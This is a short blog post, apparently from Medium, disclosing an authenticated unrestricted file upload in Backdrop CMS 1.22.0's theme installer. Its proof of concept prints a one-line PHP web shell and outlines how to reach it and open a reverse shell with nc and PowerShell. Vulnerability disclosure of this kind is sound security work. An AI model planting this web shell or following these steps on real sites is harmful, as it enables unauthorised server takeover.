Backdrop CMS 1.22.0 — Unrestricted File Upload (Themes)

GrimTheRipper
3 min readSep 27, 2022

Description

# An Issue is discovered in Backdrop CMS 1.22.0.

#We found a vulnerability file upload when we upload the malicious file as a theme in the theme installer on the Apperance page.

Proof of Concept

First, we login to the target application with admin privileges.

Then select Appearance and select Install new themes.

click Manual Installation.

we can upload with zip files.

so we find themes files at github.

https://github.com/backdrop-contrib/

after that we use simple web shell and zip it to theme files.

<?php system($_GET[“cmd”]); ?>

back too Manual installation and upload zip files.

Installed lateral successfully.

we use gobuster to find which path of themes.

after we know path we can access to the backdoor and execute “whoami” command.

use nc to get our reverse shell.

we use reverse shell payload from this website.

https://revshells.com

Finally execute “powershell” command to create reverse shell connection.

Author

Grim The Ripper Team by SOSECURE Thailand

--

--

GrimTheRipper

You get the best out of others when you give the best of yourself